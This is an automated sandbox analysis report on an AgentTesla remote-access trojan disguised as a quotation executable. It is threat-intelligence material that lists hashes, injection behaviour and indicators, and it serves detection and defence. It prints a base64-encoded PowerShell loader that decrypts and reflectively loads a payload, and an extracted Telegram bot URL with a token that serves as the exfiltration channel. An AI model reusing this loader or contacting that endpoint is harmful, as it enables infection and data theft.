Analysis
-
max time kernel
137s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 14:51
Static task
static1
Behavioral task
behavioral1
Sample
QUOTATION SHEET_RFQ 564077 2024.5.17.exe
Resource
win7-20240508-en
General
-
Target
QUOTATION SHEET_RFQ 564077 2024.5.17.exe
-
Size
988KB
-
MD5
bfeee0c844094e78262beb304526f216
-
SHA1
844c0a9df056cc6690c90814158859e0fe728394
-
SHA256
a9f8962e8fe80bbe7b1462f0c4d776abeb968a6c8f33fca3074a54b45d09ad9a
-
SHA512
ad26d27557d7f8cfd7ddad346dabeb43e66ae9d87197728122bab0a71cda51d82489939d7ceeb9acbc15d41bcf9eb30cb4da7b353316fc9317bd25b8edeb42aa
-
SSDEEP
24576:Hf0htH9iGnLexsKea/NfBe+STqRd3wtsyUUmoXg:HidcGnax+a/N5dKyoXg
Malware Config
Extracted
agenttesla
https://api.telegram.org/bot7170832252:AAF_Vb1zK1ZjcPMY_oQJwptCJR2tZkpXYmo/
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3712 set thread context of 3544 3712 powershell.exe msbuild.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exemsbuild.exepid process 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 3544 msbuild.exe 3544 msbuild.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exemsbuild.exedescription pid process Token: SeDebugPrivilege 3712 powershell.exe Token: SeDebugPrivilege 3544 msbuild.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
QUOTATION SHEET_RFQ 564077 2024.5.17.exepowershell.exedescription pid process target process PID 4268 wrote to memory of 3712 4268 QUOTATION SHEET_RFQ 564077 2024.5.17.exe powershell.exe PID 4268 wrote to memory of 3712 4268 QUOTATION SHEET_RFQ 564077 2024.5.17.exe powershell.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe PID 3712 wrote to memory of 3544 3712 powershell.exe msbuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\QUOTATION SHEET_RFQ 564077 2024.5.17.exe"C:\Users\Admin\AppData\Local\Temp\QUOTATION SHEET_RFQ 564077 2024.5.17.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADgARgAsACAAMAB4AEEAMwAsACAAMAB4ADUANAAsACAAMAB4ADUAMAAsACAAMAB4ADcAMQAsACAAMAB4ADQAMQAsACAAMAB4AEQAMgAsACAAMAB4AEYANQAsACAAMAB4ADEARAAsACAAMAB4ADMAQgAsACAAMAB4ADcAMgAsACAAMAB4AEEAOAAsACAAMAB4ADMAQwAsACAAMAB4AEUAOQAsACAAMAB4AEMAOQAsACAAMAB4AEYAQQAsACAAMAB4ADkANQAsACAAMAB4ADEAMgAsACAAMAB4AEUARAAsACAAMAB4AEIAQQAsACAAMAB4ADcAMgAsACAAMAB4ADUARAAsACAAMAB4AEYAMQAsACAAMAB4AEUANAAsACAAMAB4ADYAQgAsACAAMAB4AEIAOQAsACAAMAB4ADAARAAsACAAMAB4AEIAMAAsACAAMAB4ADcANwAsACAAMAB4ADIANwAsACAAMAB4ADQAOQAsACAAMAB4AEMAMQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABEADQALAAgADAAeABFAEQALAAgADAAeABBAEMALAAgADAAeAAzAEMALAAgADAAeAAzAEMALAAgADAAeAA0ADQALAAgADAAeAAwAEQALAAgADAAeAA4ADcALAAgADAAeAAwADYALAAgADAAeAA3AEMALAAgADAAeAA2ADgALAAgADAAeAAzADcALAAgADAAeAAxAEQALAAgADAAeAAxAEUALAAgADAAeABGAEIALAAgADAAeABDADMAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA2⤵
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
33KB
MD57088c133505af9dd34ece4683fb69cbd
SHA129ce71145aaec80bfb0d6e10d992235914715110
SHA2566252e15e89dd49a51309a2e6944e36838752fa6aa619e777d5692a243a1bf316
SHA512061bf41c4ea0d786fdc5be73894d9944bfb67e533bb2b924ece799b19c50714a0573c98a99eb1150b7920fcebbc429eb6a4b71105ed9cb5d67044961910c3b9f